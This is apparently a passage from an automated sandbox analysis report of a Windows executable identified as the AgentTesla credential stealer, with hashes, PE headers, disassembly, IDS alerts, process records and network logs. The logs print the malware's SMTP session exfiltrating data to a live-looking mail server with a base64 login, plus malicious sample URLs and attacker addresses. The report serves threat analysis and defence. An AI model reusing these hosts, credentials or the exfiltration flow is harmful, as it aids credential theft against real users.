                                                                  https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.94.87
                                                                  https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  Fuji Xerox ENCLOSED - Revised DRAFT.pdfGet hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                  • 188.114.97.3
                                                                  VoiceOfRefugees_xls.htmlGet hashmaliciousUnknownBrowse
                                                                  • 188.114.96.3
                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, XWormBrowse
                                                                  • 1.1.1.1
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttp://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.74.152
                                                                  5jh97SOa7H.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.74.152
                                                                  Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  RFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.74.152
                                                                  b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 172.67.74.152
                                                                  file.exeGet hashmaliciousLummaC, XWormBrowse
                                                                  • 172.67.74.152
                                                                  Scan- 00399905 Payment slip.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.74.152
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\D6yz87XjgM.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):50
                                                                  Entropy (8bit):1.5212424590621707
                                                                  Encrypted:false
                                                                  SSDEEP:3:/lvlp:p
                                                                  MD5:C851BF93667BDD6310D56581D955C2AE
                                                                  SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                                                                  SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                                                                  SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:........................................user.
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.4541856796164225
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • VXD Driver (31/22) 0.00%
                                                                  File name:D6yz87XjgM.exe
                                                                  File size:1'653'512 bytes
                                                                  MD5:eb180d9ac3c0ee0feb1b997ef3908f36
                                                                  SHA1:17dcf2886e1dce74561ac12b4374b7d441f399b8
                                                                  SHA256:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be
                                                                  SHA512:7afb7b99b23754e8edbee1d1ef2fad3191aac17e49eded473c3fe1a806607721717549bb7ffc131c6ab670c83bc8149a76de392b94d8d55cccb6c9296ab19f8c
                                                                  SSDEEP:49152:LbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zgjT:Xdr3drCdrzdrddrRdrgX
                                                                  TLSH:F1759D43724C57ADDAA30B31F63FC0A413259EBF56144B1B32CBFB2D19BA15B492A2C5
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eg.g..........................................@..........................@......h......................................
                                                                  Icon Hash:6ced8d96b2ace4b2
                                                                  Entrypoint:0x57c3ae
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x67076765 [Thu Oct 10 05:34:29 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e0e5cba487d80ef75c8cfd3e40cc6131
                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 29/07/2022 03:15:36 29/07/2025 03:15:36
                                                                  Subject Chain
                                                                  • E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
                                                                  Version:3
                                                                  Thumbprint MD5:D26432F60E2A3BBEB3537B78CB826828
                                                                  Thumbprint SHA-1:71AB79E1C8FF155838C37A5299AE215C52BF6D1D
                                                                  Thumbprint SHA-256:BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
                                                                  Serial:7AE2B5021371F092A904B6FA
                                                                  Instruction
                                                                  jmp 00007FCDA4BD6A6Eh
                                                                  add byte ptr [ebp-75h], dl
                                                                  in al, dx
                                                                  push ecx
                                                                  push ecx
                                                                  push 00401006h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  push 00000014h
                                                                  pop eax
                                                                  call 00007FCDA4BD6781h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-08h], esp
                                                                  mov dword ptr [ebp-04h], 0057E490h
                                                                  call 00007FCDA4D1FCEEh
                                                                  push 0057C3F7h
                                                                  jmp 00007FCDA4D51B5Bh
                                                                  lea ecx, dword ptr [ebp-20h]
                                                                  call 00007FCDA4BD696Ah
                                                                  ret
                                                                  ret
                                                                  lea esi, dword ptr [ebp-20h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  movsd
                                                                  movsd
                                                                  movsd
                                                                  movsd
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  leave
                                                                  retn 0004h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push ecx
                                                                  push ecx
                                                                  push 00401006h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  push 00000018h
                                                                  pop eax
                                                                  call 00007FCDA4BD6720h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-08h], esp
                                                                  mov dword ptr [ebp-04h], 0057E4A0h
                                                                  mov dword ptr [ebp-24h], 00000030h
                                                                  push 00000004h
                                                                  lea eax, dword ptr [ebp-24h]
                                                                  push eax
                                                                  push 00000022h
                                                                  push FFFFFFFFh
                                                                  call 00007FCDA4BE001Dh
                                                                  call 00007FCDA4BD685Ah
                                                                  push 0057C46Eh
                                                                  jmp 00007FCDA4D51B5Bh
                                                                  lea ecx, dword ptr [ebp-20h]
                                                                  call 00007FCDA4BD68F3h
                                                                  ret
                                                                  ret
                                                                  lea esi, dword ptr [ebp-20h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  movsd
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x17e51c0x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1830000x10b18.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1910000x2b08.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x17e0000x1e4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x17c7140x17d0008255470300e1a49d0f64e4d18447a703False0.6001585312089895data6.503870538873717IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x17e0000xd040x10008b49f51d5aecf86a97629e56d1bce9aeFalse0.324462890625data4.396409590241252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x17f0000x3d240x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1830000x10b180x11000b438a85e6b16962e124be0333a78acd7False0.08263442095588236data3.7430046353398554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1830e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m0.07952797823258015
                                                                  RT_GROUP_ICON0x1939100x14data1.15
                                                                  RT_VERSION0x1939240x1f4dataGermanGermany0.5
                                                                  DLLImport
                                                                  KERNEL32.DLLGetProcAddress, VirtualAlloc, GetModuleHandleW
                                                                  MSVBVM60.DLL__vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  GermanGermany
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-05T16:05:16.773977+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749741TCP
                                                                  2024-11-05T16:06:01.795556+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.755627TCP
                                                                  2024-11-05T16:06:46.896832+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.749706162.254.34.31587TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 5, 2024 16:05:04.720576048 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:04.720626116 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:04.720705986 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:04.764120102 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:04.764157057 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.373469114 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.373564959 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:05.379415035 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:05.379445076 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.379707098 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.484930992 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:05.531333923 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.681911945 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.681977034 CET44349704172.67.74.152192.168.2.7
                                                                  Nov 5, 2024 16:05:05.682143927 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:05.734992027 CET49704443192.168.2.7172.67.74.152
                                                                  Nov 5, 2024 16:05:06.651954889 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:06.657038927 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:06.657151937 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.448519945 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.449330091 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.454313993 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.610507965 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.611438990 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.616348982 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.773389101 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.774463892 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.779706955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.942066908 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.942506075 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.947351933 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:08.103552103 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:08.103756905 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:08.109263897 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.244976044 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245137930 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.245445967 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245486021 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.245628119 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245657921 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.246100903 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.246134043 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.250422955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.409636974 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.410505056 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410572052 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410609961 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410625935 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.415962934 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.415972948 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.416086912 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.416096926 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.606158018 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.661096096 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.732836008 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.737782955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.896697998 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.896831989 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.902301073 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.902365923 CET49706587192.168.2.7162.254.34.31
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 5, 2024 16:05:04.509944916 CET6385453192.168.2.71.1.1.1
                                                                  Nov 5, 2024 16:05:04.709742069 CET53638541.1.1.1192.168.2.7
                                                                  Nov 5, 2024 16:05:22.278187037 CET53574861.1.1.1192.168.2.7
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 5, 2024 16:05:04.509944916 CET192.168.2.71.1.1.10x677dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 5, 2024 16:05:04.709742069 CET1.1.1.1192.168.2.70x677dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  Nov 5, 2024 16:05:04.709742069 CET1.1.1.1192.168.2.70x677dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  Nov 5, 2024 16:05:04.709742069 CET1.1.1.1192.168.2.70x677dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  • api.ipify.org
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.749704172.67.74.1524437908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-05 15:05:05 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-11-05 15:05:05 UTC399INHTTP/1.1 200 OK
                                                                  Date: Tue, 05 Nov 2024 15:05:05 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 14
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  cf-cache-status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 8dddbd71a8d56b30-DFW
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=2520452&cwnd=230&unsent_bytes=0&cid=9b77fc2287e7f7dc&ts=317&x=0"
                                                                  2024-11-05 15:05:05 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                  Data Ascii: 173.254.250.76


                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Nov 5, 2024 16:05:07.448519945 CET58749706162.254.34.31192.168.2.7220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                  Nov 5, 2024 16:05:07.449330091 CET49706587192.168.2.7162.254.34.31EHLO 830021
                                                                  Nov 5, 2024 16:05:07.610507965 CET58749706162.254.34.31192.168.2.7250-server1.educt.shop127.0.0.1
                                                                  250-PIPELINING
                                                                  250-SIZE 204800000
                                                                  250-ETRN
                                                                  250-STARTTLS
                                                                  250-AUTH PLAIN LOGIN
                                                                  250-AUTH=PLAIN LOGIN
                                                                  250-ENHANCEDSTATUSCODES
                                                                  250-8BITMIME
                                                                  250-DSN
                                                                  250 CHUNKING
                                                                  Nov 5, 2024 16:05:07.611438990 CET49706587192.168.2.7162.254.34.31AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                                                  Nov 5, 2024 16:05:07.773389101 CET58749706162.254.34.31192.168.2.7334 UGFzc3dvcmQ6
                                                                  Nov 5, 2024 16:05:07.942066908 CET58749706162.254.34.31192.168.2.7235 2.7.0 Authentication successful
                                                                  Nov 5, 2024 16:05:07.942506075 CET49706587192.168.2.7162.254.34.31MAIL FROM:<sendxsenses@vetrys.shop>
                                                                  Nov 5, 2024 16:05:08.103552103 CET58749706162.254.34.31192.168.2.7250 2.1.0 Ok
                                                                  Nov 5, 2024 16:05:08.103756905 CET49706587192.168.2.7162.254.34.31RCPT TO:<senses@vetrys.shop>
                                                                  Nov 5, 2024 16:05:09.244976044 CET58749706162.254.34.31192.168.2.7250 2.1.5 Ok
                                                                  Nov 5, 2024 16:05:09.245137930 CET49706587192.168.2.7162.254.34.31DATA
                                                                  Nov 5, 2024 16:05:09.245445967 CET58749706162.254.34.31192.168.2.7250 2.1.5 Ok
                                                                  Nov 5, 2024 16:05:09.245628119 CET58749706162.254.34.31192.168.2.7250 2.1.5 Ok
                                                                  Nov 5, 2024 16:05:09.246100903 CET58749706162.254.34.31192.168.2.7250 2.1.5 Ok
                                                                  Nov 5, 2024 16:05:09.409636974 CET58749706162.254.34.31192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                                                  Nov 5, 2024 16:05:09.410625935 CET49706587192.168.2.7162.254.34.31.
                                                                  Nov 5, 2024 16:05:09.606158018 CET58749706162.254.34.31192.168.2.7250 2.0.0 Ok: queued as 313B76F1DE
                                                                  Nov 5, 2024 16:06:46.732836008 CET49706587192.168.2.7162.254.34.31QUIT
                                                                  Nov 5, 2024 16:06:46.896697998 CET58749706162.254.34.31192.168.2.7221 2.0.0 Bye

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:4
                                                                  Start time:10:04:57
                                                                  Start date:05/11/2024
                                                                  Path:C:\Users\user\Desktop\D6yz87XjgM.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\D6yz87XjgM.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'653'512 bytes
                                                                  MD5 hash:EB180D9AC3C0EE0FEB1B997EF3908F36
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:10:05:02
                                                                  Start date:05/11/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                  Imagebase:0x230000
                                                                  File size:65'440 bytes
                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:10:05:02
                                                                  Start date:05/11/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                  Imagebase:0xb90000
                                                                  File size:65'440 bytes
                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
